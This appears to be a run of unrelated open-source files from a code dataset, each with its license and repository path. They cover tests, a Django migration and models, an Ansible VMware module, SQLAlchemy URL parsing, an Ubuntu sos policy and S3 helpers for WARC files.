load_on_init=False) lsblk_uuids = lh._lsblk_uuid() self.assertIsInstance(lsblk_uuids, dict) self.assertIn(b'/dev/loop0', lsblk_uuids) self.assertIn(b'/dev/sda1', lsblk_uuids) self.assertEqual(lsblk_uuids[b'/dev/mapper/an-example-mapper with a space in the name'], b'84639acb-013f-4d2f-9392-526a572b4373') self.assertEqual(lsblk_uuids[b'/dev/sda1'], b'32caaec3-ef40-4691-a3b6-438c3f9bc1c0')
gpl-3.0
xflr6/concepts
tests/test_tools.py
1
1642
import pytest from concepts import tools def test_maximal(): items = map(frozenset, ((1,), (2,), (3,), (1, 2))) assert set(tools.maximal(items)) == {frozenset([3]), frozenset([1, 2])} def test_sha256sum(tmp_path): filepath = tmp_path / 'spam.txt' filepath.write_text('spam', encoding='ascii') result = tools.sha256sum(filepath) assert result == '4e388ab32b10dc8dbc7e28144f552830adc74787c1e2c0824032078a79f227fb' def test_write_lines(tmp_path): filepath = tmp_path / 'spam.txt' tools.write_lines(filepath, ['spam']) assert filepath.read_text(encoding='ascii') == 'spam\n' def test_csv_iterows(tmp_path): filepath = tmp_path / 'spam.csv' filepath.write_bytes(b'name\r\nspam\r\n') rows = list(tools.csv_iterrows(filepath, dialect='excel')) assert rows == [['name'], ['spam']] def test_write_csv(tmp_path): filepath = tmp_path / 'spam.csv' tools.write_csv(filepath, [('spam',)], header=['name']) assert filepath.read_text(encoding='ascii') == ('name\n' 'spam\n') def test_dump_json_invalid_path(): with pytest.raises(TypeError, match=r'path_or_fileobj'): tools.dump_json({}, object()) def test_load_json_invalid_path(): with pytest.raises(TypeError, match=r'path_or_fileobj'): tools.load_json(object()) def test_dump_load(path_or_fileobj, encoding, obj={'sp\xe4m': 'eggs'}): tools.dump_json(obj, path_or_fileobj, encoding=encoding) if hasattr(path_or_fileobj, 'seek'): path_or_fileobj.seek(0) assert tools.load_json(path_or_fileobj, encoding=encoding) == obj
mit
nirmeshk/oh-mainline
mysite/profile/migrations/0042_asheesh_make_all_existing_dias_stale.py
17
10859
# This file is part of OpenHatch. # Copyright (C) 2009 OpenHatch, Inc. # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. from south.db import db from django.db import models from mysite.profile.models import * class Migration: no_dry_run = True def forwards(self, orm): # Adding field 'DataImportAttempt.stale' db.add_column('profile_dataimportattempt', 'stale', orm['profile.dataimportattempt:stale']) # Any existing DIAs ought to be made "stale" for dia in orm['profile.dataimportattempt'].objects.all(): dia.stale = True dia.save() def backwards(self, orm): # Deleting field 'DataImportAttempt.stale' db.delete_column('profile_dataimportattempt', 'stale') models = { 'auth.group': { 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '80', 'unique': 'True'}), 'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'blank': 'True'}) }, 'auth.permission': { 'Meta': {'unique_together': "(('content_type', 'codename'),)"}, 'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}) }, 'auth.user': { 'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}), 'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}), 'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}), 'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}), 'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}), 'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'blank': 'True'}), 'username': ('django.db.models.fields.CharField', [], {'max_length': '30', 'unique': 'True'}) }, 'contenttypes.contenttype': { 'Meta': {'unique_together': "(('app_label', 'model'),)", 'db_table': "'django_content_type'"}, 'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}) }, 'profile.dataimportattempt': { 'completed': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}), 'failed': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'person': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.Person']"}), 'person_wants_data': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}), 'query': ('django.db.models.fields.CharField', [], {'max_length': '200'}), 'source': ('django.db.models.fields.CharField', [], {'max_length': '2'}), 'stale': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}) }, 'profile.link_person_tag': { 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'person': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.Person']"}), 'source': ('django.db.models.fields.CharField', [], {'max_length': '200'}), 'tag': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.Tag']"}) }, 'profile.link_project_tag': { 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['search.Project']"}), 'source': ('django.db.models.fields.CharField', [], {'max_length': '200'}), 'tag': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.Tag']"}) }, 'profile.link_projectexp_tag': { 'Meta': {'unique_together': "[('tag', 'project_exp', 'source')]"}, 'favorite': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'project_exp': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.ProjectExp']"}), 'source': ('django.db.models.fields.CharField', [], {'max_length': '200'}), 'tag': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.Tag']"}) }, 'profile.link_sf_proj_dude_fm': { 'Meta': {'unique_together': "[('person', 'project')]"}, 'date_collected': ('django.db.models.fields.DateTimeField', [], {}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_admin': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}), 'person': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.SourceForgePerson']"}), 'position': ('django.db.models.fields.CharField', [], {'max_length': '200'}), 'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.SourceForgeProject']"}) }, 'profile.person': { 'gotten_name_from_ohloh': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'interested_in_working_on': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '1024'}), 'last_polled': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(1970, 1, 1, 0, 0)'}), 'photo': ('django.db.models.fields.files.ImageField', [], {'default': "''", 'max_length': '100'}), 'show_email': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'unique': 'True'}) }, 'profile.projectexp': { 'data_import_attempt': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.DataImportAttempt']", 'null': 'True'}), 'description': ('django.db.models.fields.TextField', [], {}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'man_months': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True'}), 'person': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.Person']", 'null': 'True'}), 'person_role': ('django.db.models.fields.CharField', [], {'max_length': '200'}), 'primary_language': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}), 'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['search.Project']"}), 'should_show_this': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}), 'source': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}), 'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True'}) }, 'profile.sourceforgeperson': { 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'username': ('django.db.models.fields.CharField', [], {'max_length': '200'}) }, 'profile.sourceforgeproject': { 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'unixname': ('django.db.models.fields.CharField', [], {'max_length': '200'}) }, 'profile.tag': { 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'tag_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.TagType']"}), 'text': ('django.db.models.fields.CharField', [], {'max_length': '50'}) }, 'profile.tagtype': { 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'prefix': ('django.db.models.fields.CharField', [], {'max_length': '20'}) }, 'search.project': { 'icon_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'language': ('django.db.models.fields.CharField', [], {'max_length': '200'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'unique': 'True'}) } } complete_apps = ['profile']
agpl-3.0
zerothi/sids
sisl/tests/test_sgeom.py
1
4988
import pytest import math as m import numpy as np from sisl import Geometry, Atom, SuperCell from sisl.geometry import sgeom @pytest.fixture def setup(): class t(): def __init__(self): bond = 1.42 sq3h = 3.**.5 * 0.5 self.sc = SuperCell(np.array([[1.5, sq3h, 0.], [1.5, -sq3h, 0.], [0., 0., 10.]], np.float64) * bond, nsc=[3, 3, 1]) C = Atom(Z=6, R=[bond * 1.01] * 2) self.g = Geometry(np.array([[0., 0., 0.], [1., 0., 0.]], np.float64) * bond, atoms=C, sc=self.sc) self.mol = Geometry([[i, 0, 0] for i in range(10)], sc=[50]) def sg_g(**kwargs): kwargs['ret_geometry'] = True if 'geometry' not in kwargs: kwargs['geometry'] = self.g return sgeom(**kwargs) self.sg_g = sg_g def sg_mol(**kwargs): kwargs['ret_geometry'] = True if 'geometry' not in kwargs: kwargs['geometry'] = self.mol return sgeom(**kwargs) self.sg_mol = sg_mol return t() @pytest.mark.geometry class TestGeometry: def test_help(self): with pytest.raises(SystemExit): sgeom(argv=['--help']) def test_version(self): sgeom(argv=['--version']) def test_cite(self): sgeom(argv=['--cite']) def test_tile1(self, setup): cell = np.copy(setup.g.sc.cell) cell[0, :] *= 2 for tile in ['tile 2 x', 'tile-x 2']: tx = setup.sg_g(argv=('--' + tile).split()) assert np.allclose(cell, tx.sc.cell) cell[1, :] *= 2 for tile in ['tile 2 y', 'tile-y 2']: ty = setup.sg_g(geometry=tx, argv=('--' + tile).split()) assert np.allclose(cell, ty.sc.cell) cell[2, :] *= 2 for tile in ['tile 2 z', 'tile-z 2']: tz = setup.sg_g(geometry=ty, argv=('--' + tile).split()) assert np.allclose(cell, tz.sc.cell) def test_tile2(self, setup): cell = np.copy(setup.g.sc.cell) cell[:, :] *= 2 for xt in ['tile 2 x', 'tile-x 2']: xt = '--' + xt for yt in ['tile 2 y', 'tile-y 2']: yt = '--' + yt for zt in ['tile 2 z', 'tile-z 2']: zt = '--' + zt argv = ' '.join([xt, yt, zt]).split() t = setup.sg_g(argv=argv) assert np.allclose(cell, t.sc.cell) def test_repeat1(self, setup): cell = np.copy(setup.g.sc.cell) cell[0, :] *= 2 for repeat in ['repeat 2 x', 'repeat-x 2']: tx = setup.sg_g(argv=('--' + repeat).split()) assert np.allclose(cell, tx.sc.cell) cell[1, :] *= 2 for repeat in ['repeat 2 y', 'repeat-y 2']: ty = setup.sg_g(geometry=tx, argv=('--' + repeat).split()) assert np.allclose(cell, ty.sc.cell) cell[2, :] *= 2 for repeat in ['repeat 2 z', 'repeat-z 2']: tz = setup.sg_g(geometry=ty, argv=('--' + repeat).split()) assert np.allclose(cell, tz.sc.cell) def test_repeat2(self, setup): cell = np.copy(setup.g.sc.cell) cell[:, :] *= 2 for xt in ['repeat 2 x', 'repeat-x 2']: xt = '--' + xt for yt in ['repeat 2 y', 'repeat-y 2']: yt = '--' + yt for zt in ['repeat 2 z', 'repeat-z 2']: zt = '--' + zt argv = ' '.join([xt, yt, zt]).split() t = setup.sg_g(argv=argv) assert np.allclose(cell, t.sc.cell) def test_sub1(self, setup): for a, l in [('0', 1), ('0,1', 2), ('0-1', 2)]: g = setup.sg_g(argv=['--sub', a]) assert len(g) == l def test_rotation1(self, setup): rot = setup.sg_g(argv='--rotate 180 z'.split()) rot.sc.cell[2, 2] *= -1 assert np.allclose(-rot.sc.cell, setup.g.sc.cell) assert np.allclose(-rot.xyz, setup.g.xyz) rot = setup.sg_g(argv='--rotate-z 180'.split()) rot.sc.cell[2, 2] *= -1 assert np.allclose(-rot.sc.cell, setup.g.sc.cell) assert np.allclose(-rot.xyz, setup.g.xyz) rot = setup.sg_g(argv='--rotate rpi z'.split()) rot.sc.cell[2, 2] *= -1 assert np.allclose(-rot.sc.cell, setup.g.sc.cell) assert np.allclose(-rot.xyz, setup.g.xyz) rot = setup.sg_g(argv='--rotate-z rpi'.split()) rot.sc.cell[2, 2] *= -1 assert np.allclose(-rot.sc.cell, setup.g.sc.cell) assert np.allclose(-rot.xyz, setup.g.xyz) def test_swap(self, setup): s = setup.sg_g(argv='--swap 0 1'.split()) for i in [0, 1, 2]: assert np.allclose(setup.g.xyz[::-1, i], s.xyz[:, i])
lgpl-3.0
cryptobanana/ansible
lib/ansible/modules/cloud/vmware/vmware_target_canonical_facts.py
47
2585
#!/usr/bin/python # -*- coding: utf-8 -*- # (c) 2015, Joseph Callen <jcallen () csc.com> # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import absolute_import, division, print_function __metaclass__ = type ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'community'} DOCUMENTATION = ''' --- module: vmware_target_canonical_facts short_description: Return canonical (NAA) from an ESXi host description: - Return canonical (NAA) from an ESXi host based on SCSI target ID version_added: "2.0" author: Joseph Callen notes: requirements: - Tested on vSphere 5.5 - PyVmomi installed options: target_id: description: - The target id based on order of scsi device required: True extends_documentation_fragment: vmware.documentation ''' EXAMPLES = ''' # Example vmware_target_canonical_facts command from Ansible Playbooks - name: Get Canonical name local_action: module: vmware_target_canonical_facts hostname: "{{ ansible_ssh_host }}" username: root password: vmware target_id: 7 ''' try: from pyVmomi import vim, vmodl HAS_PYVMOMI = True except ImportError: HAS_PYVMOMI = False from ansible.module_utils.basic import AnsibleModule from ansible.module_utils.vmware import HAS_PYVMOMI, connect_to_api, get_all_objs, vmware_argument_spec def find_hostsystem(content): host_system = get_all_objs(content, [vim.HostSystem]) for host in host_system: return host return None def main(): argument_spec = vmware_argument_spec() argument_spec.update(dict(target_id=dict(required=True, type='int'))) module = AnsibleModule(argument_spec=argument_spec, supports_check_mode=False) if not HAS_PYVMOMI: module.fail_json(msg='pyvmomi is required for this module') content = connect_to_api(module) host = find_hostsystem(content) target_lun_uuid = {} scsilun_canonical = {} # Associate the scsiLun key with the canonicalName (NAA) for scsilun in host.config.storageDevice.scsiLun: scsilun_canonical[scsilun.key] = scsilun.canonicalName # Associate target number with LUN uuid for target in host.config.storageDevice.scsiTopology.adapter[0].target: for lun in target.lun: target_lun_uuid[target.target] = lun.scsiLun module.exit_json(changed=False, canonical=scsilun_canonical[target_lun_uuid[module.params['target_id']]]) if __name__ == '__main__': main()
gpl-3.0
jolevq/odoopub
extra-addons/account_bank_voucher_transfer/wizard/bank_statement_populate.py
7
2093
# -*- coding: utf-8 -*- ############################################################################## # # OpenERP, Open Source Management Solution # Copyright (C) 2013 Cubic ERP - Teradata SAC (<http://cubicerp.com>). # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## from openerp.osv import osv class account_voucher_populate_statement(osv.osv_memory): _inherit = "account.voucher.populate.statement" def get_statement_line_new(self,cr,uid,voucher,statement,context=None): res = super(account_voucher_populate_statement,self).get_statement_line_new(cr,uid,voucher,statement,context=context) if voucher.type == 'transfer': sign = -1.0 account_id = voucher.transfer_id.src_journal_id.default_debit_account_id and voucher.transfer_id.src_journal_id.default_debit_account_id.id or res['account_id'] res['name'] = voucher.transfer_id.name res['ref'] = voucher.transfer_id.origin for line in voucher.line_ids: if line.account_id.type == 'payable': sign = -1.0 account_id = line.account_id.id if line.type == 'cr': sign = -1.0 * sign res['account_id'] = account_id res['amount'] = sign * res['amount'] res['type'] = (sign > 0) and 'customer' or 'supplier' return res
agpl-3.0
mikedanese/test-infra
metrics/influxdb_test.py
7
4440
#!/usr/bin/env python # Copyright 2017 The Kubernetes Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Test influxdb.py.""" import BaseHTTPServer import threading import re import unittest import influxdb class TestInfluxPoint(unittest.TestCase): def test_from_dict(self): def check(sample, measurement, tags, fields, time): point = influxdb.Point.from_dict(sample) self.assertEqual(point.measurement, measurement) self.assertEqual(point.tags, tags) self.assertEqual(point.fields, fields) self.assertEqual(point.time, time) check( { 'measurement': 'metric', 'tags': {'style': 'stylish'}, 'fields': {'baseball': 'diamond', 'basketball': False}, 'time': 42 }, 'metric', {'style': 'stylish'}, {'baseball': 'diamond', 'basketball': False}, 42, ) check( { 'measurement': 'metric', 'tags': {}, 'fields': {'num': 2.7}, }, 'metric', {}, {'num': 2.7}, None, ) # Check that objects that don't meet the InfluxPoint spec are unchanged. sample = { 'measurement': 'metric', 'tags': {'tag': 'value'}, 'notfields': 'something', } self.assertEqual(influxdb.Point.from_dict(sample), sample) def test_serialize(self): def check(measurement, tags, fields, time, expected): point = influxdb.Point(measurement, tags, fields, time) self.assertEqual(point.serialize(), expected) check( 'metric', {'type': 'good'}, {'big?': True, 'size': 20}, 42, 'metric,type=good big?=True,size=20 42', ) check( 'measure with spaces', {'tag,with,comma': 'tagval=with=equals'}, {',,': 20.2, 'string': 'yarn'}, None, r'measure\ with\ spaces,tag\,with\,comma=tagval\=with\=equals \,\,=20.2,string="yarn"', ) check( 'measure with spaces', {'tag,with,comma': 'tagval=with=equals'}, {',,': 20.2, 'string': 'yarn'}, None, r'measure\ with\ spaces,tag\,with\,comma=tagval\=with\=equals \,\,=20.2,string="yarn"', ) class RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler): def do_POST(self): # pylint: disable=invalid-name if not self.path.startswith('/write'): raise ValueError( 'path should start with \'/write\', but is \'%s\'' % self.path ) body = self.rfile.read(int(self.headers.getheader('content-length'))) new_ids = [int(match) for match in re.findall(r'id=(\d+)', body)] self.server.received = self.server.received.union(new_ids) self.send_response(201) class TestInfluxPusher(unittest.TestCase): def setUp(self): self.port = 8000 self.written = 0 self.test_server = BaseHTTPServer.HTTPServer( ('', self.port), RequestHandler, ) self.test_server.received = set() thread = threading.Thread(target=self.test_server.serve_forever) thread.start() def tearDown(self): self.test_server.shutdown() for num in xrange(self.written): self.assertIn(num, self.test_server.received) def test_push(self): points = [influxdb.Point('metric', {}, {'id': num}, None) for num in xrange(110)] pusher = influxdb.Pusher( 'localhost:%d' % self.port, None, 'username', 'pass123', ) pusher.push(points, 'mydb') self.written = 110 if __name__ == '__main__': unittest.main()
apache-2.0
cytec/SickRage
lib/sqlalchemy/engine/url.py
80
7492
# engine/url.py # Copyright (C) 2005-2014 the SQLAlchemy authors and contributors <see AUTHORS file> # # This module is part of SQLAlchemy and is released under # the MIT License: http://www.opensource.org/licenses/mit-license.php """Provides the :class:`~sqlalchemy.engine.url.URL` class which encapsulates information about a database connection specification. The URL object is created automatically when :func:`~sqlalchemy.engine.create_engine` is called with a string argument; alternatively, the URL is a public-facing construct which can be used directly and is also accepted directly by ``create_engine()``. """ import re from .. import exc, util from . import Dialect from ..dialects import registry class URL(object): """ Represent the components of a URL used to connect to a database. This object is suitable to be passed directly to a :func:`~sqlalchemy.create_engine` call. The fields of the URL are parsed from a string by the :func:`.make_url` function. the string format of the URL is an RFC-1738-style string. All initialization parameters are available as public attributes. :param drivername: the name of the database backend. This name will correspond to a module in sqlalchemy/databases or a third party plug-in. :param username: The user name. :param password: database password. :param host: The name of the host. :param port: The port number. :param database: The database name. :param query: A dictionary of options to be passed to the dialect and/or the DBAPI upon connect. """ def __init__(self, drivername, username=None, password=None, host=None, port=None, database=None, query=None): self.drivername = drivername self.username = username self.password = password self.host = host if port is not None: self.port = int(port) else: self.port = None self.database = database self.query = query or {} def __to_string__(self, hide_password=True): s = self.drivername + "://" if self.username is not None: s += _rfc_1738_quote(self.username) if self.password is not None: s += ':' + ('***' if hide_password else _rfc_1738_quote(self.password)) s += "@" if self.host is not None: if ':' in self.host: s += "[%s]" % self.host else: s += self.host if self.port is not None: s += ':' + str(self.port) if self.database is not None: s += '/' + self.database if self.query: keys = list(self.query) keys.sort() s += '?' + "&".join("%s=%s" % (k, self.query[k]) for k in keys) return s def __str__(self): return self.__to_string__(hide_password=False) def __repr__(self): return self.__to_string__() def __hash__(self): return hash(str(self)) def __eq__(self, other): return \ isinstance(other, URL) and \ self.drivername == other.drivername and \ self.username == other.username and \ self.password == other.password and \ self.host == other.host and \ self.database == other.database and \ self.query == other.query def get_dialect(self): """Return the SQLAlchemy database dialect class corresponding to this URL's driver name. """ if '+' not in self.drivername: name = self.drivername else: name = self.drivername.replace('+', '.') cls = registry.load(name) # check for legacy dialects that # would return a module with 'dialect' as the # actual class if hasattr(cls, 'dialect') and \ isinstance(cls.dialect, type) and \ issubclass(cls.dialect, Dialect): return cls.dialect else: return cls def translate_connect_args(self, names=[], **kw): """Translate url attributes into a dictionary of connection arguments. Returns attributes of this url (`host`, `database`, `username`, `password`, `port`) as a plain dictionary. The attribute names are used as the keys by default. Unset or false attributes are omitted from the final dictionary. :param \**kw: Optional, alternate key names for url attributes. :param names: Deprecated. Same purpose as the keyword-based alternate names, but correlates the name to the original positionally. """ translated = {} attribute_names = ['host', 'database', 'username', 'password', 'port'] for sname in attribute_names: if names: name = names.pop(0) elif sname in kw: name = kw[sname] else: name = sname if name is not None and getattr(self, sname, False): translated[name] = getattr(self, sname) return translated def make_url(name_or_url): """Given a string or unicode instance, produce a new URL instance. The given string is parsed according to the RFC 1738 spec. If an existing URL object is passed, just returns the object. """ if isinstance(name_or_url, util.string_types): return _parse_rfc1738_args(name_or_url) else: return name_or_url def _parse_rfc1738_args(name): pattern = re.compile(r''' (?P<name>[\w\+]+):// (?: (?P<username>[^:/]*) (?::(?P<password>.*))? @)? (?: (?: \[(?P<ipv6host>[^/]+)\] | (?P<ipv4host>[^/:]+) )? (?::(?P<port>[^/]*))? )? (?:/(?P<database>.*))? ''', re.X) m = pattern.match(name) if m is not None: components = m.groupdict() if components['database'] is not None: tokens = components['database'].split('?', 2) components['database'] = tokens[0] query = (len(tokens) > 1 and dict(util.parse_qsl(tokens[1]))) or None if util.py2k and query is not None: query = dict((k.encode('ascii'), query[k]) for k in query) else: query = None components['query'] = query if components['username'] is not None: components['username'] = _rfc_1738_unquote(components['username']) if components['password'] is not None: components['password'] = _rfc_1738_unquote(components['password']) ipv4host = components.pop('ipv4host') ipv6host = components.pop('ipv6host') components['host'] = ipv4host or ipv6host name = components.pop('name') return URL(name, **components) else: raise exc.ArgumentError( "Could not parse rfc1738 URL from string '%s'" % name) def _rfc_1738_quote(text): return re.sub(r'[:@/]', lambda m: "%%%X" % ord(m.group(0)), text) def _rfc_1738_unquote(text): return util.unquote(text) def _parse_keyvalue_args(name): m = re.match(r'(\w+)://(.*)', name) if m is not None: (name, args) = m.group(1, 2) opts = dict(util.parse_qsl(args)) return URL(name, *opts) else: return None
gpl-3.0
epssy/hue
desktop/core/ext-py/Django-1.6.10/tests/one_to_one/models.py
55
1604
""" 10. One-to-one relationships To define a one-to-one relationship, use ``OneToOneField()``. In this example, a ``Place`` optionally can be a ``Restaurant``. """ from __future__ import unicode_literals from django.db import models from django.utils.encoding import python_2_unicode_compatible @python_2_unicode_compatible class Place(models.Model): name = models.CharField(max_length=50) address = models.CharField(max_length=80) def __str__(self): return "%s the place" % self.name @python_2_unicode_compatible class Restaurant(models.Model): place = models.OneToOneField(Place, primary_key=True) serves_hot_dogs = models.BooleanField(default=False) serves_pizza = models.BooleanField(default=False) def __str__(self): return "%s the restaurant" % self.place.name @python_2_unicode_compatible class Waiter(models.Model): restaurant = models.ForeignKey(Restaurant) name = models.CharField(max_length=50) def __str__(self): return "%s the waiter at %s" % (self.name, self.restaurant) class ManualPrimaryKey(models.Model): primary_key = models.CharField(max_length=10, primary_key=True) name = models.CharField(max_length = 50) class RelatedModel(models.Model): link = models.OneToOneField(ManualPrimaryKey) name = models.CharField(max_length = 50) @python_2_unicode_compatible class MultiModel(models.Model): link1 = models.OneToOneField(Place) link2 = models.OneToOneField(ManualPrimaryKey) name = models.CharField(max_length=50) def __str__(self): return "Multimodel %s" % self.name
apache-2.0
slashdd/sos
sos/policies/distros/ubuntu.py
1
2953
# This file is part of the sos project: https://github.com/sosreport/sos # # This copyrighted material is made available to anyone wishing to use, # modify, copy, or redistribute it subject to the terms and conditions of # version 2 of the GNU General Public License. # # See the LICENSE file in the source distribution for further information. from sos.report.plugins import UbuntuPlugin from sos.policies.distros.debian import DebianPolicy import os class UbuntuPolicy(DebianPolicy): distro = "Ubuntu" vendor = "Canonical" vendor_urls = [ ('Community Website', 'https://www.ubuntu.com/'), ('Commercial Support', 'https://www.canonical.com') ] PATH = "/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games" \ + ":/usr/local/sbin:/usr/local/bin:/snap/bin" _upload_url = "https://files.support.canonical.com/uploads/" _upload_user = "ubuntu" _upload_password = "ubuntu" _use_https_streaming = True def __init__(self, sysroot=None, init=None, probe_runtime=True, remote_exec=None): super(UbuntuPolicy, self).__init__(sysroot=sysroot, init=init, probe_runtime=probe_runtime, remote_exec=remote_exec) self.valid_subclasses += [UbuntuPlugin] @classmethod def check(cls, remote=''): """This method checks to see if we are running on Ubuntu. It returns True or False.""" if remote: return cls.distro in remote try: with open('/etc/lsb-release', 'r') as fp: return "Ubuntu" in fp.read() except IOError: return False def dist_version(self): """ Returns the version stated in DISTRIB_RELEASE """ try: with open('/etc/lsb-release', 'r') as fp: lines = fp.readlines() for line in lines: if "DISTRIB_RELEASE" in line: return line.split("=")[1].strip() return False except IOError: return False def get_upload_https_auth(self): if self.upload_url.startswith(self._upload_url): return (self._upload_user, self._upload_password) else: return super(UbuntuPolicy, self).get_upload_https_auth() def get_upload_url_string(self): if self.upload_url.startswith(self._upload_url): return "Canonical Support File Server" else: return self.get_upload_url() def get_upload_url(self): if not self.upload_url or self.upload_url.startswith(self._upload_url): if not self.upload_archive_name: return self._upload_url fname = os.path.basename(self.upload_archive_name) return self._upload_url + fname super(UbuntuPolicy, self).get_upload_url() # vim: set et ts=4 sw=4 :
gpl-2.0
sloanyang/Scrapy-BrowserBenchmark
bbenchmark/hanzo/warctools/s3.py
1
1445
from urlparse import urlparse from cStringIO import StringIO try: from boto.s3.connection import S3Connection from boto.s3.key import Key except ImportError: def open_url(url, offset=None, length=None): raise ImportError('boto') def list_files(prefix): raise ImportError('boto') else: def open_url(url, offset=None, length=None): p = urlparse(url) bucket_name = p.netloc key = p.path[1:] conn = S3Connection() bucket = conn.get_bucket(bucket_name) k = Key(bucket) k.key = key if offset is not None and length is not None: headers = {'Range': 'bytes=%d-%d' % (offset, offset + length)} elif offset is not None: headers = {'Range': 'bytes=%d-' % offset} else: headers = {} s = StringIO() k.get_contents_to_file(s, headers=headers) s.seek(0) return s def list_files(prefix): p = urlparse(prefix) bucket_name = p.netloc prefix = p.path[1:] conn = S3Connection() bucket = conn.get_bucket(bucket_name) complete = False marker = '' while not complete: rs = bucket.get_all_keys(prefix=prefix, marker=marker, delimiter='') for k in rs: yield 's3://%s/%s' % (bucket_name, k.key) marker = k.key complete = not rs.is_truncated
gpl-2.0
leorochael/odoo
addons/account_test/report/account_test_report.py
27
3861
